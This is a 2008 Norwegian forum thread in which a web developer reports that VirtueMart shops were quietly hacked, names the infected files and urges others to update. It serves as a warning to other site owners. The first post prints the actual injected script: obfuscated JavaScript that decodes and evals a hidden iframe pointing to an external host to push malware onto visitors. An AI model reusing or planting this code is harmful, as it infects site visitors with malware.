Virtuemart hacket

Alle spørsmål relatert til nettbutikkløsningen VirtueMart

Moderators: sone12, Per Yngve Berg

Locked
User avatar
kjartan
Joomla! Intern
Joomla! Intern
Posts: 53
Joined: Wed May 09, 2007 1:21 pm
Contact:

Virtuemart hacket

Post by kjartan » Mon Sep 22, 2008 8:18 pm

Var litt usikker på hvilket forum jeg skulle legge dette i, men siden jeg bare har opplevd dette med VM, la jeg det her, selv om det strengt tatt ikke har noe direkte med VM å gjøre.

Som de fleste sikkert har fått med seg, ble Domenehop utsatt for omfattende hacking i begynnelsen av august. En del av hackingen var greit å oppdage med sine uvakre tyrkiske symboler og slagord. Men etter en stund ble jeg oppmerksom på en mindre synlig hacking:
En av våre kunder klagde på at hans nettbrukere sa at de fikk virus etc. når de besøkte sidene deres. Vi testet litt overfladisk og fant ikke noe galt. Så dukket det opp en kunde til med samme sak. Begge brukte VM. Jeg sjekket VM filene, og fant noen som var skrevet til i perioden 8.-12. august. Disse inneholdt et javascript som ikke skulle være der. Samme mønster fant jeg hos flere med VM. Javascriptet som var lagt inn var kryptert. Her er et eksempel på hvordan det så ut:

Code: Select all

   
<script language="JavaScript" type="text/javascript">
CFB84="pars";CFB84+="eI";CFB84+="nt";D94B5AFC4461CA9="Str";D94B5AFC4461CA9+="ing";D94B5AFC4461CA9+=".fr";D94B5AFC4461CA9+="omCha";D94B5AFC4461CA9+="rC";D94B5AFC4461CA9+="ode";function C89C6E(EE5DA1D){var D24FB604=904;D24FB604=D24FB604-888;A5874097=eval(CFB84+"(EE5DA1D,D24FB604)");return(A5874097);}function AA42F34(A002D72CC54){var AC4EAE3E776F=687;AC4EAE3E776F=AC4EAE3E776F-685;var C6902AC="";for(E610BF=0;E610BF<A002D72CC54.length;E610BF+=AC4EAE3E776F){C6902AC+=( eval(D94B5AFC4461CA9+"(C89C6E(A002D72CC54.substr(E610BF,AC4EAE3E776F)))"));}eval(C6902AC);}AA42F34("68726A683D646F63756D656E742E676574456C656D656E7442794964282778636B716F27293B69662868726A683D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D78636B716F207372633D687474703A2F2F67636F756E7465722E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>
Etter det jeg kan huske, var det filene:
administrator/components/com_virtuemart/html/phpshop.error.php
og
components/com_virtuemart/index.html
i tillegg til de fleste javascript-filene (.js) som var infisert.

Dette fungerte altså slik at nettsidene oppførte seg OK for det meste, mens innimellom virket det som scriptene plutselig bestemte seg for å slå til og prøvde å laste ned virusfiler fra et fremmed nettsted.

Det er kun på J1.0 steder jeg har sett dette foreløpig. Alle som ble hacket manglet siste versjon av enten Joomla eller VM. Fant vel et 10-talls slike nettsteder.

Det virket som et målrettet angrep mot VM. Skulle vært interessant å høre om andre kjente til dette.

Uansett bør alle som har VM installert - i allefall hos Domeneshop - sjekke de filene jeg har nevnt.

Moralen er:
  • En nettside kan være hacket uten at det umiddelbart sees
  • Oppdater alltid nettsidene med siste versjoner av Joomla og alle komponenter
Kjell Johnsen - http://www.exentra.no
A bad workman quarrels with his tools

 
User avatar
sone12
Joomla! Champion
Joomla! Champion
Posts: 5440
Joined: Wed Oct 11, 2006 1:12 pm
Location: Kristiansand, Norway
Contact:

Re: Virtuemart hacket

Post by sone12 » Mon Sep 22, 2008 10:30 pm

Godt og viktig observert kjartan. Nok mange som får en tankevekker på at det er viktig å holde versjonene oppdatert, både på Joomla! og 3.parts utgivelser. Godt du deler denne erfaringen med resten av oss.
Kristian P. Granrud - Global Moderator

Floranett
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 160
Joined: Sun Mar 12, 2006 7:11 pm

Re: Virtuemart hacket

Post by Floranett » Mon Sep 22, 2008 10:59 pm

Ja takk for info Kjartan.

 

Locked

Return to “VirtueMart”